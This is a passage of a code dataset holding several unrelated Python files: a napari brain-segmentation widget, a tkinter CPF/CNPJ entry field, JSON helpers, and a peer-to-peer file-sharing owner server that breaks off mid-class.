print('train model')\n train('cnndata/cnn_train_word.npy', 'cnndata/cnn_train_pos1.npy', 'cnndata/cnn_train_pos2.npy',\n 'cnndata/cnn_train_y.npy', 'model/origin_cnn_model.ckpt')\n\n # produce reward sentence_ebd average_reward for rlmodel\n print('produce reward sentence_ebd average_reward for rlmodel')\n # produce_rldata(save_path='model/origin_cnn_model.ckpt')\n\n\n\n\n\n","sub_path":"cnnmodel.py","file_name":"cnnmodel.py","file_ext":"py","file_size_in_byte":19813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"96678384","text":"import json\nfrom conf import setting\nfrom common.logger import log\n\n\ndef readJson(filepath):\n '''Fetch JSON data from a file'''\n try:\n with open(filepath,'r') as f :\n data = json.load(f) # json.loads would need f.read(); json.load takes the file object\n return data\n except Exception as e:\n log.error(e)\n\ndef writeJson(filepath,data):\n try:\n with open(filepath, 'w') as f:\n f.seek(0) # move the offset back to the start of the file before writing\n dta = json.dumps(data)\n f.write(dta)\n except Exception as e:\n log.error(\"Failed to open the file before writing JSON!\")","sub_path":"hsq_InterfaceTest/common/operationJson.py","file_name":"operationJson.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"312047842","text":"import napari\nimport numpy as np\nfrom pathlib import Path\nfrom napari.qt.threading import thread_worker\nfrom qtpy import QtCore\n\nfrom qtpy.QtWidgets import (\n QLabel,\n QFileDialog,\n QGridLayout,\n QGroupBox,\n QWidget,\n)\n\nfrom bg_atlasapi import BrainGlobeAtlas\n\nfrom brainreg_segment.paths import Paths\n\nfrom brainreg_segment.regions.IO import (\n save_label_layers,\n export_label_layers,\n)\n\nfrom brainreg_segment.tracks.IO import save_track_layers, export_splines\n\nfrom brainreg_segment.atlas.utils import (\n get_available_atlases,\n structure_from_viewer,\n)\nfrom 
brainreg_segment.layout.utils import display_warning\n\n# LAYOUT HELPERS ################################################################################\n\n# from brainreg_segment.layout.utils import (\n# disable_napari_key_bindings,\n# disable_napari_btns,\n# overwrite_napari_roll,\n# )\nfrom brainreg_segment.layout.gui_constants import (\n WINDOW_HEIGHT,\n WINDOW_WIDTH,\n COLUMN_WIDTH,\n SEGM_METHODS_PANEL_ALIGN,\n LOADING_PANEL_ALIGN,\n BOUNDARIES_STRING,\n TRACK_FILE_EXT,\n DISPLAY_REGION_INFO,\n)\n\nfrom brainreg_segment.layout.gui_elements import (\n add_button,\n add_combobox,\n)\n\n# SEGMENTATION ################################################################################\nfrom brainreg_segment.segmentation_panels.regions import RegionSeg\nfrom brainreg_segment.segmentation_panels.tracks import TrackSeg\n\n\nclass SegmentationWidget(QWidget):\n def __init__(\n self,\n viewer: napari.viewer.Viewer,\n boundaries_string=BOUNDARIES_STRING,\n ):\n super(SegmentationWidget, self).__init__()\n\n # general variables\n self.viewer = viewer\n\n # Disable / overwrite napari viewer functions\n # that either do not make sense or should be avoided by the user\n # removed for now, to make sure plugin\n # disable_napari_btns(self.viewer)\n # disable_napari_key_bindings()\n # overwrite_napari_roll(self.viewer)\n\n # Main layers\n self.base_layer = [] # Contains registered brain / reference brain\n self.atlas_layer = [] # Contains annotations / region information\n\n # Other data\n self.hemispheres_data = []\n\n # Track variables\n self.track_layers = []\n\n # Region variables\n self.label_layers = []\n\n # Atlas variables\n self.current_atlas_name = \"\"\n self.atlas = None\n\n self.boundaries_string = boundaries_string\n self.directory = \"\"\n # Set up segmentation methods\n self.region_seg = RegionSeg(self)\n self.track_seg = TrackSeg(self)\n\n # Generate main layout\n self.setup_main_layout()\n\n if DISPLAY_REGION_INFO:\n\n @self.viewer.mouse_move_callbacks.append\n def display_region_info(v, event):\n \"\"\"\n Show brain region info on mouse over in status bar on the right\n \"\"\"\n assert self.viewer == v\n if v.dims.ndisplay == 2:\n if len(v.layers) and self.atlas_layer and self.atlas:\n _, _, _, region_info = structure_from_viewer(\n self.viewer.status, self.atlas_layer, self.atlas\n )\n self.viewer.help = region_info\n else:\n self.viewer.help = \"\"\n\n def setup_main_layout(self):\n \"\"\"\n Construct main layout of widget\n \"\"\"\n self.layout = QGridLayout()\n self.layout.setContentsMargins(10, 10, 10, 10)\n self.layout.setAlignment(QtCore.Qt.AlignTop)\n self.layout.setSpacing(4)\n\n # 3 Steps:\n # - Loading panel\n # - Segmentation methods panel\n # -> Individual segmentation methods (which are invisible at first)\n # - Saving panel\n\n self.add_loading_panel(1)\n self.add_segmentation_methods_panel(1)\n self.track_seg.add_track_panel(2) # Track segmentation subpanel\n self.region_seg.add_region_panel(3) # Region segmentation subpanel\n self.add_saving_panel(4)\n\n # Take care of status label\n self.status_label = QLabel()\n self.status_label.setText(\"Ready\")\n self.layout.addWidget(self.status_label, 5, 0)\n\n self.setLayout(self.layout)\n\n # PANELS ###############################################################\n\n def add_segmentation_methods_panel(self, row, column=1):\n \"\"\"\n Segmentation methods chooser panel:\n Toggle visibility of segmentation\n methods\n \"\"\"\n self.toggle_methods_panel = QGroupBox(\"Segmentation\")\n self.toggle_methods_layout = 
QGridLayout()\n self.toggle_methods_layout.setContentsMargins(10, 10, 10, 10)\n self.toggle_methods_layout.setSpacing(5)\n self.toggle_methods_layout.setAlignment(QtCore.Qt.AlignBottom)\n\n self.show_trackseg_button = add_button(\n \"Track tracing\",\n self.toggle_methods_layout,\n self.track_seg.toggle_track_panel,\n 0,\n 1,\n minimum_width=COLUMN_WIDTH,\n alignment=SEGM_METHODS_PANEL_ALIGN,\n )\n self.show_trackseg_button.setEnabled(False)\n\n self.show_regionseg_button = add_button(\n \"Region segmentation\",\n self.toggle_methods_layout,\n self.region_seg.toggle_region_panel,\n 1,\n 1,\n minimum_width=COLUMN_WIDTH,\n alignment=SEGM_METHODS_PANEL_ALIGN,\n )\n self.show_regionseg_button.setEnabled(False)\n\n self.toggle_methods_layout.setColumnMinimumWidth(1, COLUMN_WIDTH)\n self.toggle_methods_panel.setLayout(self.toggle_methods_layout)\n self.toggle_methods_panel.setVisible(True)\n\n self.layout.addWidget(self.toggle_methods_panel, row, column, 1, 1)\n\n def add_loading_panel(self, row, column=0):\n \"\"\"\n Loading panel:\n - Load project (sample space)\n - Load project (atlas space)\n - Atlas chooser\n \"\"\"\n self.load_data_panel = QGroupBox(\"Load data\")\n self.load_data_layout = QGridLayout()\n self.load_data_layout.setSpacing(15)\n self.load_data_layout.setContentsMargins(10, 10, 10, 10)\n self.load_data_layout.setAlignment(QtCore.Qt.AlignBottom)\n\n self.load_button = add_button(\n \"Load project (sample space)\",\n self.load_data_layout,\n self.load_brainreg_directory_sample,\n 0,\n 0,\n visibility=False,\n minimum_width=COLUMN_WIDTH,\n alignment=LOADING_PANEL_ALIGN,\n )\n\n self.load_button_standard = add_button(\n \"Load project (atlas space)\",\n self.load_data_layout,\n self.load_brainreg_directory_standard,\n 1,\n 0,\n visibility=False,\n minimum_width=COLUMN_WIDTH,\n alignment=LOADING_PANEL_ALIGN,\n )\n\n self.add_atlas_menu(self.load_data_layout)\n\n self.load_data_layout.setColumnMinimumWidth(0, COLUMN_WIDTH)\n self.load_data_panel.setLayout(self.load_data_layout)\n self.load_data_panel.setVisible(True)\n\n self.layout.addWidget(self.load_data_panel, row, column, 1, 1)\n\n # buttons made visible after adding to main widget, preventing them\n # from briefly appearing in a separate window\n self.load_button.setVisible(True)\n self.load_button_standard.setVisible(True)\n\n def add_saving_panel(self, row):\n \"\"\"\n Saving/Export panel\n \"\"\"\n self.save_data_panel = QGroupBox()\n self.save_data_layout = QGridLayout()\n\n self.export_button = add_button(\n \"To brainrender\",\n self.save_data_layout,\n self.export_to_brainrender,\n 0,\n 0,\n visibility=False,\n )\n self.save_button = add_button(\n \"Save\", self.save_data_layout, self.save, 0, 1, visibility=False\n )\n\n self.save_data_layout.setColumnMinimumWidth(1, COLUMN_WIDTH)\n self.save_data_panel.setLayout(self.save_data_layout)\n self.layout.addWidget(self.save_data_panel, row, 0, 1, 2)\n\n self.save_data_panel.setVisible(False)\n\n # ATLAS INTERACTION ####################################################\n\n def add_atlas_menu(self, layout):\n list_of_atlasses = [\"Load atlas\"]\n available_atlases = get_available_atlases()\n for atlas in available_atlases.keys():\n atlas_desc = f\"{atlas} v{available_atlases[atlas]}\"\n list_of_atlasses.append(atlas_desc)\n atlas_menu, _ = add_combobox(\n layout,\n None,\n list_of_atlasses,\n 2,\n 0,\n label_stack=True,\n callback=self.initialise_atlas,\n width=COLUMN_WIDTH,\n )\n\n self.atlas_menu = atlas_menu\n\n def initialise_atlas(self):\n atlas_string = 
self.atlas_menu.currentText()\n atlas_name = atlas_string.split(\" \")[0].strip()\n if atlas_name != self.current_atlas_name:\n status = self.remove_layers()\n if not status: # Something prevented deletion\n self.reset_atlas_menu()\n return\n else:\n print(f\"{atlas_string} already selected for segmentation.\")\n self.reset_atlas_menu()\n return\n\n # Get / set output directory\n self.set_output_directory()\n if not self.directory:\n self.reset_atlas_menu()\n return\n\n self.current_atlas_name = atlas_name\n # Instantiate atlas layers\n self.load_atlas()\n\n self.directory = self.directory / atlas_name\n self.paths = Paths(self.directory, atlas_space=True)\n\n self.status_label.setText(\"Ready\")\n # Set window title\n # self.viewer.title = f\"Atlas: {self.current_atlas_name}\"\n self.initialise_segmentation_interface()\n # Check / load previous regions and tracks\n self.region_seg.check_saved_region()\n self.track_seg.check_saved_track()\n self.reset_atlas_menu()\n\n def set_output_directory(self):\n self.status_label.setText(\"Loading...\")\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n self.directory = QFileDialog.getExistingDirectory(\n self,\n \"Select output directory\",\n options=options,\n )\n if self.directory != \"\":\n self.directory = Path(self.directory)\n\n def load_atlas(self):\n atlas = BrainGlobeAtlas(self.current_atlas_name)\n self.atlas = atlas\n self.base_layer = self.viewer.add_image(\n self.atlas.reference,\n name=\"Reference\",\n )\n self.atlas_layer = self.viewer.add_labels(\n self.atlas.annotation,\n name=self.atlas.atlas_name,\n blending=\"additive\",\n opacity=0.3,\n visible=False,\n )\n self.standard_space = True\n\n def reset_atlas_menu(self):\n # Reset menu for atlas - show initial description\n self.atlas_menu.blockSignals(True)\n self.atlas_menu.setCurrentIndex(0)\n self.atlas_menu.blockSignals(False)\n\n # BRAINREG INTERACTION #################################################\n\n def load_brainreg_directory_sample(self):\n self.get_brainreg_directory(standard_space=False)\n\n def load_brainreg_directory_standard(self):\n self.get_brainreg_directory(standard_space=True)\n\n def get_brainreg_directory(self, standard_space):\n \"\"\"\n Shows file dialog to choose output directory\n and sets global directory info\n \"\"\"\n if standard_space:\n self.plugin = \"brainreg-standard\"\n self.standard_space = True\n else:\n self.plugin = \"brainglobe-io\"\n self.standard_space = False\n\n self.status_label.setText(\"Loading...\")\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n brainreg_directory = QFileDialog.getExistingDirectory(\n self,\n \"Select brainreg directory\",\n options=options,\n )\n\n if not brainreg_directory:\n return\n\n if self.directory != brainreg_directory:\n status = self.remove_layers()\n if not status:\n return # Something prevented deletion\n self.directory = Path(brainreg_directory)\n else:\n print(f\"{str(brainreg_directory)} already loaded.\")\n return\n\n # Otherwise, proceed loading brainreg dir\n self.load_brainreg_directory()\n\n def load_brainreg_directory(self):\n \"\"\"\n Opens brainreg folder in napari.\n Calls initialise_loaded_data to set up layers / info.\n Then checks for previously loaded data.\n\n \"\"\"\n try:\n self.viewer.open(str(self.directory), plugin=self.plugin)\n self.paths = Paths(\n self.directory,\n standard_space=self.standard_space,\n )\n self.initialise_loaded_data()\n except ValueError:\n print(\n f\"The directory ({self.directory}) does not 
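# Minimal standalone use of the BrainGlobeAtlas API that load_atlas above
# relies on (bg_atlasapi); the atlas name is just an example, and the data
# is downloaded on first use.
from bg_atlasapi import BrainGlobeAtlas

atlas = BrainGlobeAtlas("allen_mouse_50um")
print(atlas.resolution)        # voxel size in micrometres, e.g. (50, 50, 50)
print(atlas.reference.shape)   # reference image volume
print(atlas.annotation.shape)  # annotation (label) volume, same shape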
appear to be \"\n                f\"a brainreg directory, please try again.\"\n            )\n            return\n\n        # Check / load previous regions and tracks\n        self.region_seg.check_saved_region()\n        self.track_seg.check_saved_track()\n\n    def initialise_loaded_data(self):\n        \"\"\"\n        Set up brainreg layers in napari / fill with new data and info\n\n        \"\"\"\n        try:\n            self.viewer.layers.remove(self.boundaries_string)\n        except ValueError:\n            pass\n\n        self.base_layer = self.viewer.layers[\"Registered image\"]\n        self.metadata = self.base_layer.metadata\n        self.atlas = self.metadata[\"atlas_class\"]\n        self.atlas_layer = self.viewer.layers[self.metadata[\"atlas\"]]\n        if self.standard_space:\n            self.hemispheres_data = self.atlas.hemispheres\n        else:\n            self.hemispheres_data = self.viewer.layers[\"Hemispheres\"].data\n\n        self.initialise_segmentation_interface()\n\n        # Set window title\n        # self.viewer.title = (\n        #     f\"Brainreg: {self.metadata['atlas']} ({self.plugin})\"\n        # )\n        self.status_label.setText(\"Ready\")\n\n    # MORE LAYOUT COMPONENTS ###########################################\n\n    def initialise_segmentation_interface(self):\n        self.reset_variables()\n        self.initialise_image_view()\n        self.save_data_panel.setVisible(True)\n        self.save_button.setVisible(True)\n        self.export_button.setVisible(self.standard_space)\n        self.show_regionseg_button.setEnabled(True)\n        self.show_trackseg_button.setEnabled(True)\n        self.status_label.setText(\"Ready\")\n\n    def initialise_image_view(self):\n        self.set_z_position()\n\n    def set_z_position(self):\n        midpoint = int(round(len(self.base_layer.data) / 2))\n        self.viewer.dims.set_point(0, midpoint)\n\n    def reset_variables(self):\n        \"\"\"\n        Reset atlas scale dependent variables\n        - point_size (Track segmentation)\n        - spline_size (Track segmentation)\n        - brush_size (Region segmentation)\n        \"\"\"\n        self.mean_voxel_size = int(\n            np.sum(self.atlas.resolution) / len(self.atlas.resolution)\n        )\n        self.track_seg.point_size = (\n            self.track_seg.point_size_default / self.mean_voxel_size\n        )\n        self.track_seg.spline_size = (\n            self.track_seg.spline_size_default / self.mean_voxel_size\n        )\n        self.region_seg.brush_size = (\n            self.region_seg.brush_size_default / self.mean_voxel_size\n        )\n        return\n\n    def remove_layers(self):\n        \"\"\"\n        TODO: This needs work. Runs into an error currently\n        when switching from an annotated project to another one\n        \"\"\"\n        if len(self.viewer.layers) != 0:\n            # Check with user if that is really what is wanted\n            if self.track_layers or self.label_layers:\n                choice = display_warning(\n                    self,\n                    \"About to remove layers\",\n                    \"All layers are about to be deleted. Proceed?\",\n                )\n                if not choice:\n                    print('Preventing deletion because user chose \"Cancel\"')\n                    return False\n\n            # Remove old layers\n            for layer in list(self.viewer.layers):\n                try:\n                    self.viewer.layers.remove(layer)\n                except IndexError: # no idea why this happens\n                    pass\n\n            # There seems to be a napari bug trying to access previously used slider\n            # values. Trying to circumvent for now\n            self.viewer.window.qt_viewer.dims._last_used = None\n\n        self.track_layers = []\n        self.label_layers = []\n        return True\n\n    def save(self):\n        if self.label_layers or self.track_layers:\n            choice = display_warning(\n                self,\n                \"About to save files\",\n                \"Existing files will be deleted. 
Proceed?\",\n )\n if choice:\n print(\"Saving\")\n worker = save_all(\n self.paths.regions_directory,\n self.paths.tracks_directory,\n self.label_layers,\n self.track_layers,\n track_file_extension=TRACK_FILE_EXT,\n )\n worker.start()\n else:\n print('Not saving because user chose \"Cancel\" \\n')\n\n def export_to_brainrender(self):\n choice = display_warning(\n self,\n \"About to export files\",\n \"Existing files will be will be deleted. Proceed?\",\n )\n if choice:\n print(\"Exporting\")\n worker = export_all(\n self.paths.regions_directory,\n self.paths.tracks_directory,\n self.label_layers,\n self.track_seg.splines,\n self.track_seg.spline_names,\n self.atlas.resolution[0],\n )\n worker.start()\n else:\n print('Not exporting because user chose \"Cancel\" \\n')\n\n\n@thread_worker\ndef export_all(\n regions_directory,\n tracks_directory,\n label_layers,\n splines,\n spline_names,\n resolution,\n):\n if label_layers:\n export_label_layers(regions_directory, label_layers, resolution)\n\n if splines:\n export_splines(tracks_directory, splines, spline_names, resolution)\n print(\"Finished!\\n\")\n\n\n@thread_worker\ndef save_all(\n regions_directory,\n tracks_directory,\n label_layers,\n points_layers,\n track_file_extension=\".points\",\n):\n\n if label_layers:\n save_label_layers(regions_directory, label_layers)\n\n if points_layers:\n save_track_layers(\n tracks_directory,\n points_layers,\n track_file_extension=track_file_extension,\n )\n print(\"Finished!\\n\")\n\n\ndef main():\n print(\"Loading segmentation GUI.\\n \")\n with napari.gui_qt():\n viewer = napari.Viewer() # title=\"Segmentation GUI\")\n viewer.window.resize(WINDOW_WIDTH, WINDOW_HEIGHT)\n widget = SegmentationWidget(viewer)\n viewer.window.add_dock_widget(widget, name=\"General\", area=\"right\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"brainreg_segment/segment.py","file_name":"segment.py","file_ext":"py","file_size_in_byte":19672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"322088597","text":"# Lucas Petersen\n# 12 de Fevereiro de 2021\n\nimport tkinter as tk\nimport warnings\nfrom pycadastros import formatCadastro\n\n\nclass EntryCPF:\n def __init__(self):\n pass\n\n\nclass EntryCNPJ:\n def __init__(self):\n pass\n\n\nclass EntryCadastro:\n def __init__(self, root, truebd='#74c454', falsebd='#c7271c', justify=tk.CENTER, borderwidth=3, mask=True,\n update=True, changeBorder=True, highlightcolor='white', **kwargs):\n # TODO -- CONFIG -- criar opção de dar update no resultado ou não (callback)\n # TODO -- CONFIG -- criar opção de mudar a cor da borda ou não\n # TODO -- WIDGET -- criar opção de mask de cpf, mask de cnpj ou a atual, que serve pros dois\n # TODO -- VALIDAÇÃO -- criar opção de fill leading zeros ou não\n # TODO -- VALIDAÇÃO -- Autodetecção (validação por callback) não considera leading zeros ainda\n\n self.textvar = tk.StringVar()\n self.root = root\n self.borderwidth = borderwidth\n self.validate = 'key'\n self.vcmd = (self.root.register(self.validateNumbers), '%S')\n self.updateEntry = self.callback\n self.justify = justify\n self.truebd = truebd\n self.falsebd = falsebd\n self.mask = mask\n self.update = update\n self.changeBorder = changeBorder\n self.highlightcolor = highlightcolor\n\n self.mywidget = tk.Entry(self.root, validate=self.validate, vcmd=self.vcmd, justify=self.justify,\n highlightthickness=self.borderwidth, textvariable=self.textvar,\n highlightcolor=highlightcolor, **kwargs)\n\n self.x = 0\n self.y = 0\n self.width 
= 0\n        self.height = 0\n\n        self.textvar.trace('w', lambda name, index, mode, sv=self.textvar: self.updateEntry())\n        self.textvar.trace('w', lambda *args: self.characterLimit())\n\n    def callback(self):\n        self.mywidget.config(highlightcolor=self.falsebd, highlightbackground=self.falsebd)\n        self.mywidget.config(selectbackground=self.mywidget.cget('highlightcolor'))\n        cad = self.mywidget.get()\n        if cad is not None:\n            if len(self.mywidget.get().replace(',', '').replace('.', '').replace('/', '').replace('-', '')) >= 11:\n                if self.mask:\n                    cadmasked = self.get(mask=True)\n                else:\n                    cadmasked = self.get(mask=False)\n                if cadmasked is not None:\n                    self.textvar.set(cadmasked)\n                    self.mywidget.config(vcmd=self.vcmd)\n                    self.mywidget.icursor('end')\n\n    def characterLimit(self):\n        # rebuild the string instead of removing items while iterating,\n        # which would skip characters\n        allowed = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '-', '/', '.']\n        lchars = [lchar for lchar in str(self.mywidget.get()) if lchar in allowed]\n\n        self.textvar.set(''.join(lchars))\n        if len(self.mywidget.get()) > 14:\n            self.textvar.set(self.mywidget.get()[:-1])\n\n    # TODO -- DEBUG -- understand why this function triggers that Warning\n    def validateNumbers(self, n):\n        if n in ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '.', '/', '-']:\n            return True\n        else:\n            return False\n\n    def get(self, mask=False, fill=True):\n        if mask and not fill:\n            warnings.warn(\"'fill' was converted to True because 'mask' is True.\")\n        self.mywidget.config(highlightcolor=self.truebd, highlightbackground=self.truebd)\n        self.mywidget.config(selectbackground=self.mywidget.cget('highlightcolor'))\n\n        cadastro = formatCadastro(self.mywidget.get())\n        if cadastro is None:\n            self.mywidget.config(highlightcolor=self.falsebd, highlightbackground=self.falsebd)\n            return None\n\n        else:\n            self.mywidget.config(highlightcolor=self.truebd, highlightbackground=self.truebd)\n            self.mywidget.config(selectbackground=self.mywidget.cget('highlightcolor'))\n            if mask:\n                return cadastro[2]\n\n            else:\n                if fill:\n                    return cadastro[1]\n                else:\n                    return cadastro[0]\n\n    def getType(self):\n        return formatCadastro(self.mywidget.get())[3]\n\n    def isValid(self):\n        return formatCadastro(self.mywidget.get()) is not None\n\n    def isCPF(self):\n        try:\n            cadastro = formatCadastro(self.mywidget.get())[3]\n        except:\n            return False\n        return cadastro == 'CPF'\n\n    def isCNPJ(self):\n        try:\n            cadastro = formatCadastro(self.mywidget.get())[3]\n        except:\n            return False\n        return cadastro == 'CNPJ'\n\n    def place(self, **kwargs):\n        self.mywidget.place(**kwargs)\n\n    def pack(self, **kwargs):\n        self.mywidget.pack(**kwargs)\n\n    def grid(self, **kwargs):\n        self.mywidget.grid(**kwargs)\n\n\nwinW, winH = 600, 300\nw, h = 270, 40\nwindow = tk.Tk()\nwindow.geometry(f'{winW}x{winH}')\nwindow.configure(background='#051d60')\n\nentry = EntryCadastro(window, font=('Century Gothic', '18'), bg='#051d60', borderwidth=1, relief=tk.FLAT, fg='white')\nentry.place(x=(winW-w)//2, y=(winH-h)//2, height=43)\n\nentry2 = EntryCadastro(window, font=('Roboto Medium', '14'), mask=False)\nentry2.place(x=(winW-w)//2, y=(winH-h)//2+h+10, width=w, height=h)\n\n\ndef myf():\n    print(entry.isValid())\n    print(entry.isCPF())\n    print(entry.isCNPJ())\n\n\ndef myf2():\n    print(entry2.get(mask=True))\n\n\nb = tk.Button(window, command=myf, text='top entry')\nb.place(x=0, y=0, width=100, height=30)\n\nb2 = tk.Button(window, command=myf2, text='bottom entry')\nb2.place(x=0, y=40, width=100, 
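# The character-limit behaviour of EntryCadastro above hangs off StringVar
# traces; the same pattern with the modern trace_add API, reduced to a
# digits-only field capped at 14 characters (a sketch, not the widget itself):
import tkinter as tk

root = tk.Tk()
var = tk.StringVar()

def limit(*_):
    cleaned = "".join(c for c in var.get() if c.isdigit())[:14]
    if cleaned != var.get():
        var.set(cleaned)

var.trace_add("write", limit)
tk.Entry(root, textvariable=var).pack()
root.mainloop()  # close the window to end the demo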
height=30)\n\nwindow.mainloop()\n","sub_path":"newEntry.py","file_name":"newEntry.py","file_ext":"py","file_size_in_byte":5724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"621407811","text":"import os.path\r\nfrom os import path\r\nimport sys\r\nimport socket\r\nfrom sys import argv\r\nfrom pathlib import Path\r\nfrom _thread import *\r\n\r\nlist_peer = {}\r\nmaster_DB = {}\r\nport_DB = {}\r\n\r\nclass Constants:\r\n LIST = \"LIST\"\r\n NAME = \"NAME\"\r\n REQUEST = \"REQUEST\"\r\n DATA = \"DATA\"\r\n REGISTER = \"REGISTER\"\r\n PEER = \"PEER\"\r\n CLOSE = \"CLOSE\"\r\n BRACE_OPEN = \"[\"\r\n CONNECTION_ESTABLISHED = \"] connection established from \" \r\n PEER_LIST = \"[Owner] Peer list:\" \r\n PEER_U_D = \"[Owner] Transmitting Upload/Download peers\" \r\n OWNER_UP_RUN = \"[Owner] Owner is up and running:\" \r\n OWNER_GETS_MESSAGE = \"[Owner] gets message (\" \r\n FROM = \") from \" \r\n ERROR_OCCURED = \"Error Occurred\" \r\n FILE_OWNER = \"File Owner\" \r\n WAITING_PEER = \" is waiting for peers...\"\r\n CONFIG = \"CONFIG\" \r\n OWNER_DIR = \"OwnerDir\" \r\n OWNER_DIR_1 = \"OwnerDir/\" \r\n BLOCK = \"Block -->\" \r\n BYTES = \" bytes\" \r\n OWNER_TOTAL = \"[Owner] Total \" \r\n BLOCKS = \" Blocks\" \r\n EQUALS = \" = \" \r\n SPACE = \" \" \r\n\r\n\r\n# This class contains all the methods required by the File Owner.\r\nclass OwnerProcess:\r\n # protected ObjectOutputStream object_output_stream\r\n # protected ObjectInputStream input_stream\r\n peer_name = 0\r\n _current_block = {}\r\n file_name = \"\"\r\n peer_id = 0\r\n port = 0\r\n\r\n # Creates the owner process that communicates with peers for all the transactions\r\n # file chunks\r\n # socket class that accepts connections from peer clients\r\n # ObjectOutputStream that writes to the specified OutputStream\r\n # deserialize\r\n\r\n def __init__(self, block, file_name, con, addr, peer_port, thread_number, peer_id, port):\r\n # print(\"Inside init of OwnerProcess\")\r\n self._current_block = block\r\n self.file_name = file_name\r\n self.con = con\r\n self.addr = addr\r\n self.clientId = peer_port\r\n self.peer_name = thread_number\r\n self.peer_id = peer_id\r\n self.port= port\r\n print(Constants.BRACE_OPEN + \"Thread-\" + str(self.peer_name) + Constants.CONNECTION_ESTABLISHED + str(addr[1]))\r\n\r\n # Communicates with peer for transferring messages\r\n # msg message to be transferred\r\n\r\n def transferMessageToPeer(self, msg):\r\n try:\r\n self.con.send(msg.encode())\r\n except:\r\n print(\"Exception in transferMessageToPeer function\")\r\n\r\n _clientId = -1\r\n\r\n # sends reponse to every peer\r\n\r\n # message message to be transferred\r\n # x\r\n\r\n def __replyToIndividualPeerRequest(self,message, x):\r\n if message == Constants.LIST:\r\n self.__performListOperation()\r\n elif message == Constants.NAME:\r\n print(self.file_name)\r\n self.transferMessageToPeer(str(self.file_name))\r\n elif message == Constants.REQUEST:\r\n self.__performRequestOperation(x)\r\n elif message == Constants.DATA:\r\n x = int(self.con.recv(1024).decode())\r\n chunk = self.con.recv(1024)\r\n elif message == Constants.REGISTER:\r\n self.__performRegisterOperation()\r\n elif message == Constants.PEER:\r\n self.__performPeerOperation()\r\n elif message == Constants.CLOSE:\r\n self.__performCloseOperation()\r\n\r\n # List all the blocks\r\n\r\n def __performListOperation(self):\r\n y = len(self._current_block)\r\n arrayList = []\r\n for i in range(0, y):\r\n if i in 
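# The owner's list operation just below serialises its block indices with
# str(list) before sending them over the socket; a peer can recover them
# with ast.literal_eval (safer than eval). A small round-trip check:
import ast

wire = str([0, 1, 2, 5]).encode()         # what the owner sends
blocks = ast.literal_eval(wire.decode())  # what a peer can parse
assert blocks == [0, 1, 2, 5]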
self._current_block.keys():\r\n arrayList.append(i)\r\n\r\n arrayList = str(arrayList)\r\n arrayList = arrayList.encode()\r\n self.con.send(arrayList)\r\n\r\n\r\n # sends download and upload neighbour to individual peer\r\n\r\n def __performPeerOperation(self):\r\n print(Constants.PEER_LIST)\r\n self.con.send((\"abc\").encode())\r\n peer_id = self.con.recv(1024)\r\n for peer in list_peer.keys():\r\n print(peer , \" \")\r\n\r\n self.con.send((\"abc\").encode())\r\n peer_port = int(self.con.recv(1024).decode())\r\n self.con.send((\"abc\").encode())\r\n download_port = int(self.con.recv(1024).decode())\r\n print(peer_port , \" \" , download_port)\r\n print(Constants.PEER_U_D)\r\n self.con.send(str(list_peer).encode())\r\n self.con.recv(1024)\r\n download_neighbor_id=0\r\n if download_port in master_DB.keys():\r\n download_neighbor_id = master_DB[download_port]\r\n self.transferMessageToPeer(str(download_neighbor_id))\r\n self.con.recv(1024)\r\n upload_neighbor_id = self.getUploadNeighbor(peer_port)\r\n self.transferMessageToPeer(str(upload_neighbor_id))\r\n\r\n\r\n # Gets the upload neighbor of a peer\r\n def getUploadNeighbor(self, peer_port):\r\n upload_neighbor_id = 0\r\n for i in port_DB.keys():\r\n if port_DB[i].getDownload_port() == peer_port:\r\n peer_id = port_DB[i].getPeer_port()\r\n upload_neighbor_id = master_DB[peer_id]\r\n break\r\n return upload_neighbor_id\r\n\r\n def __performCloseOperation(self):\r\n self.con.close()\r\n list_peer.pop(self.clientId)\r\n\r\n def __performRequestOperation(self,x):\r\n self.con.send(bytes(\"yashwant\", 'utf-8'))\r\n x = int(self.con.recv(1024).decode())\r\n self.transferMessageToPeer(str(x))\r\n self.con.recv(1024).decode()\r\n self.con.send(self._current_block[x])\r\n\r\n\r\n def __performRegisterOperation(self):\r\n peer = self.peer_id\r\n list_peer[self.peer_id] = self.port\r\n print(peer)\r\n print(list_peer)\r\n port = self.port\r\n print(port)\r\n self.transferMessageToPeer(str(peer))\r\n self.con.recv(1024).decode()\r\n self.transferMessageToPeer(str(port))\r\n\r\n def __initiate_run(self):\r\n print(Constants.OWNER_UP_RUN)\r\n input_from_peer = \"\"\r\n while True:\r\n try:\r\n input_from_peer = self.con.recv(1024)\r\n break\r\n except:\r\n print(\"Exception at __initiate_run() in OwnerProcess class\")\r\n exit()\r\n break\r\n\r\n msg = str(input_from_peer.decode())\r\n print(Constants.OWNER_GETS_MESSAGE + msg + Constants.FROM + str(self.clientId))\r\n return msg\r\n\r\n\r\n # If this thread was constructed using a separate\r\n # run object, then that\r\n # objects method is called\r\n def run(self):\r\n # print(\"Hello\")\r\n while True:\r\n # try:\r\n message = self.__initiate_run()\r\n print(Constants.OWNER_GETS_MESSAGE + message + Constants.FROM + str(self.clientId))\r\n x = -1\r\n self.__replyToIndividualPeerRequest(message, x)\r\n # except:\r\n # print(Constants.ERROR_OCCURED)\r\n # print(\"Error in run() function in OwnerProcess class\")\r\n # list_peer.pop(self.clientId)\r\n # return\r\n\r\n\r\n# Class maintaining download and upload ports of different peers\r\nclass PortDB:\r\n __peer_port = 0\r\n __download_port = 0\r\n\r\n def __init__(self, peer_port, download_port):\r\n self.__peer_port = peer_port\r\n self.__download_port = download_port\r\n\r\n def getDownload_port(self):\r\n return self.__download_port\r\n\r\n def getPeer_port(self):\r\n return self.__peer_port\r\n\r\n\r\n\r\n\r\n# Class containing all the methods required by a FileOwner.\r\nclass FileOwner:\r\n thread_number = -1\r\n __file_name = \"\"\r\n __owner_port = 
